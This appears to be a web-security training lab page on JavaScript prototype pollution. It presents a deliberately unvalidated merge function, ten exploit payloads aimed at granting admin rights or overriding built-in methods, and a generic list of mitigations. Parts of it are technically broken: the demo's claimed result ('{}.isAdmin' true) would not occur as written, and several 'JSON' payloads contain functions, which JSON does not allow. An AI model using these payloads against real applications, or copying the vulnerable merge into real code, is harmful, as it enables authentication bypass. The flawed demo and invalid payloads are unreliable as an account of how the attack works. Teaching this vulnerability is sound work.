Lab 1: Basic Prototype Pollution

Basic prototype pollution attacks

Difficulty: Low

Lab Overview

This lab demonstrates basic prototype pollution vulnerabilities where attackers can modify the prototype of base objects in JavaScript, leading to security issues like data manipulation and authentication bypass.

Objective: Understand how basic prototype pollution attacks work and how to exploit them.

Vulnerable Application
JSON Configuration Parser

This application processes JSON configuration data. Try to exploit prototype pollution vulnerabilities:

Prototype Pollution Tester
⚠️ Prototype Pollution Warning

This lab demonstrates basic prototype pollution vulnerabilities:

  • __proto__ - Direct prototype access
  • constructor - Constructor property access
  • prototype - Prototype property access
  • No validation - Missing input validation
Vulnerable Properties

These properties can be exploited for prototype pollution:

  • __proto__ - Direct prototype access
  • constructor - Constructor property access
  • prototype - Prototype property access
  • constructor.prototype - Nested prototype access
Prototype Pollution Demo
JavaScript Prototype Pollution Demonstration:

This demonstrates how prototype pollution works in JavaScript:

// Vulnerable function that doesn't validate input function merge(target, source) { for (let key in source) { if (source.hasOwnProperty(key)) { target[key] = source[key]; } } return target; } // Attacker input const maliciousInput = { "__proto__": { "isAdmin": true, "role": "admin" } }; // Vulnerable object const user = { name: "john" }; // Pollution occurs here merge(user, maliciousInput); // Now all objects have polluted prototype console.log({}.isAdmin); // true console.log({}.role); // "admin"
The demo above shows how prototype pollution can affect all objects in the application.
Processing Results
Processing Results:
No input processed yet
Vulnerability Details
  • Type: Basic Prototype Pollution
  • Severity: Medium
  • Method: Direct prototype access
  • Issue: Missing input validation
Attack Vectors
  • __proto__ Access: Direct prototype modification
  • Constructor Access: Constructor property manipulation
  • Prototype Access: Prototype property manipulation
  • Nested Access: Deep prototype manipulation
Basic Prototype Pollution Examples

Use these techniques to exploit basic prototype pollution vulnerabilities:

1. Basic __proto__ Pollution:
{ "__proto__": { "isAdmin": true, "role": "admin", "permissions": ["read", "write", "delete"] } }
2. Constructor Pollution:
{ "constructor": { "prototype": { "isAdmin": true, "role": "admin" } } }
3. Nested Prototype Pollution:
{ "constructor": { "prototype": { "constructor": { "prototype": { "isAdmin": true } } } } }
4. Array Prototype Pollution:
{ "__proto__": { "push": function() { return "hacked"; }, "length": 999 } }
5. Function Prototype Pollution:
{ "__proto__": { "toString": function() { return "hacked"; }, "valueOf": function() { return 0; } } }
6. Object Prototype Pollution:
{ "__proto__": { "hasOwnProperty": function() { return true; }, "toString": function() { return "hacked"; } } }
7. Date Prototype Pollution:
{ "__proto__": { "getTime": function() { return 0; }, "toString": function() { return "hacked"; } } }
8. String Prototype Pollution:
{ "__proto__": { "charAt": function() { return "hacked"; }, "length": 999 } }
9. Number Prototype Pollution:
{ "__proto__": { "valueOf": function() { return 0; }, "toString": function() { return "hacked"; } } }
10. Boolean Prototype Pollution:
{ "__proto__": { "valueOf": function() { return true; }, "toString": function() { return "hacked"; } } }
Real-World Attack Scenarios
Mitigation Strategies
  • Validate input to prevent prototype pollution
  • Use Object.create(null) for safe objects
  • Implement proper input sanitization
  • Use Object.freeze() to prevent modifications
  • Regular security testing and vulnerability assessments
  • Monitor for unusual object behavior
  • Implement proper authentication and authorization
  • Use secure coding practices
  • Implement rate limiting and request validation
  • Educate developers about prototype pollution